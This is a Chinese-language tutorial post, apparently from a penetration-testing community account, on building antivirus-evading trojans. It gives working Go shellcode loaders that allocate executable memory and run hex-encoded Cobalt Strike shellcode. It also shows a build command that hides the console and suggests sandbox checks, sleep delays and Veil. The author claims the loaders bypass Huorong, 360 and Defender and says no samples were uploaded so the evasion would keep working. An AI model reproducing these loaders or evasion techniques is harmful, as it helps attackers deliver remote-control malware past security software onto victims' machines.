一文带你学会0编程基础做木马免杀

更多渗透技能 ，10余本电子书及渗透工具包，搜公众号：白帽子左一

作者：掌控安全-骚骑

背景

之前分享了个免杀入门文，很浅显，比较适合小白看…

文章在社区，地址我放在这了，有兴趣可以一戳：

https://bbs.zkaq.cn/t/4456.html （ps：社区邀请码可以文末扫码找助教领取,社区投稿还有钱赚）

这次实实在在写一个，能过微软自带def，火绒，卡巴这些！

一、0x01环境

靶机：

IP：192.168.111.10

杀软：火绒，360，卡巴，微软def

本机：

IP：192.168.111.11

安装环境：cobaltstrike，go环境

二、go环境安装

由于本人很久之前就安装了，所以直接上菜鸟教程吧

https://www.runoob.com/go/go-environment.html

三、实践

1.思路

主要是内存加载，对shellcode预先编码，然后解码执行。

2.举例

因为不是每个人每种语言都精通，但是当我们有需要了的时候怎么办？

我的方法就是找个案例，然后将不懂的函数查清楚，进而开始针对个人想要的功能进行修改或者拓展。

用重剑无锋大佬的文章中的案例做个示范：

远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)

（https://github.com/TideSec/BypassAntiVirus/）

package mainimport ("io/ioutil""os""syscall""unsafe"
)const (MEM_COMMIT = 0x1000MEM_RESERVE = 0x2000PAGE_EXECUTE_READWRITE = 0x40
)var (kernel32 = syscall.MustLoadDLL("kernel32.dll")ntdll = syscall.MustLoadDLL("ntdll.dll")VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")shellcode_buf = []byte{ 0xfc, 0x48, ----shellcode----, 0xd5,}
)func checkErr(err error) {if err != nil {if err.Error() != "The operation completed successfully." {println(err.Error())os.Exit(1)}}
}
func main() {shellcode := shellcode_bufif len(os.Args) > 1 {shellcodeFileData, err := ioutil.ReadFile(os.Args[1])checkErr(err)shellcode = shellcodeFileData}addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)if addr == 0 {checkErr(err)}_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))checkErr(err)syscall.Syscall(addr, 0, 0, 0, 0)
}

在原本的文章中，是可以免杀的，但由于过了很长时间，因此现在已经凉了。

当然我们对这些不能抱多大希望，终归只是学习姿势，拓展思路

因为可能换个方式就可以了，例如我们这样实现：

package mainimport ("os""syscall""unsafe""encoding/hex")const (MEM_COMMIT = 0x1000MEM_RESERVE = 0x2000PAGE_EXECUTE_READWRITE = 0x40)var (kernel32 = syscall.MustLoadDLL("kernel32.dll")ntdll = syscall.MustLoadDLL("ntdll.dll")VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")shellcodes="--shellcode--")func checkErr(err error) {if err != nil {if err.Error() != "The operation completed successfully." {println(err.Error())os.Exit(1)}}}func main() {var shellcode []byteshellcode, _ = hex.DecodeString(shellcodes)addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)if addr == 0 {checkErr(err)}_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))checkErr(err)syscall.Syscall(addr, 0, 0, 0, 0)}

做的改变就是将本地镶嵌的shellcode换成了hex编码，如图：

（图1）

是不是感觉很简单？为啥自己没想到？先将go文件生成exe进行杀软检测吧。

执行命令：

go build -ldflags=”-H windowsgui” youer_filename

(图2)

免杀及上线情况如图3、4

（图三）

（图四）

有时候很多事情并不是想象中的那么难，就看能不能绕过那个弯，用hack的思维去考虑问题

3.拓展

上面的算是抛砖引玉吧，然后卡巴还没过去，还有个思路的，那就是测试源来的shellcode哪些连用他会出问题，测试结果是：

当在如图5中所示地点断开，火绒停止爆错。

（图5）

因此，我又开始琢磨了，是否可以在这里输入没用的字符，然后在在做下替换可行不。

替换代码如下：

 var contents = "shellcode"shellcodes, _ := regexp.Compile("xxxxx");shellcod := shellcodes.ReplaceAllString(contents, "xx")

大概思路就是讲爆错位置加入特定字符，然后利用正则识别(xxxxx)，替换成想要的内容（xx）

感觉思路是没问题的，而且测试输出的内容也是一样的。

但是就是不能运行，所以如果有熟悉go的希望能指教下。

针对反沙盒静态免杀，混淆函数免杀

针对静态免杀我们可以增加些判断，诸如主机名，计算机名这些，再有就是设置sleep这些

对于go基础为0的和我一样的，推荐直接用veil生成go文件，然后自己对其进行简单的改编。

利用上述做免杀结果

当然还有几个思路，先就到这里，继续保持学习，后续会考虑更新更详细一些，期待不断成长。

总结

总体来说，就一个问题、多看、多想、遇到问题不要慌、换个思路拐个弯做下尝试。

然后这两个我都没上传样本，基本上是断网情况测试

因此免杀效果应该是可以维持一段时间的，免杀是在不断对抗过程中成长的，勤思考多查找，总会有办法的。